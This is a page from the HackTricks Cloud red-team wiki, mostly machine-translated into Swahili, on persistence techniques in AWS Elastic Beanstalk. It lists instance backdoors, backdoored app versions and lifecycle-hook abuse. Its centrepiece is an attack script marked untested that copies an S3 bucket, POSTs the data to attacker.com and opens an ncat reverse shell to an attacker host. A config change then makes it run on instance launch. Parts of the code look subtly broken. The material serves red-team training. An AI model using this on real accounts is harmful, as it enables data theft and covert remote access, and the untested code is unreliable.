AWS - Elastic Beanstalk Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Elastic Beanstalk

For more information check:

AWS - Elastic Beanstalk Enum

Persistence in Instance

Ili kudumisha uvumilivu ndani ya akaunti ya AWS, mekanismu ya uvumilivu inaweza kuanzishwa ndani ya mfano (kazi ya cron, ufunguo wa ssh...) ili mshambuliaji aweze kuipata na kuiba akili za IAM kutoka kwa huduma ya metadata.

Backdoor in Version

Mshambuliaji anaweza kuweka backdoor kwenye msimbo ndani ya repo ya S3 ili kila wakati ifanye backdoor yake na msimbo unaotarajiwa.

New backdoored version

Badala ya kubadilisha msimbo kwenye toleo halisi, mshambuliaji anaweza kupeleka toleo jipya lililo na backdoor la programu.

Abusing Custom Resource Lifecycle Hooks

TODO: Test

Elastic Beanstalk inatoa mizunguko ya maisha ambayo inakuruhusu kuendesha skripti za kawaida wakati wa upatikanaji na kumalizika kwa mfano. Mshambuliaji anaweza kuweka mzunguko wa maisha ili kwa muda fulani kuendesha skripti inayotoa data au kudumisha ufikiaji wa akaunti ya AWS.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - ECS Persistence NextAWS - EFS Persistence

Last updated 1 month ago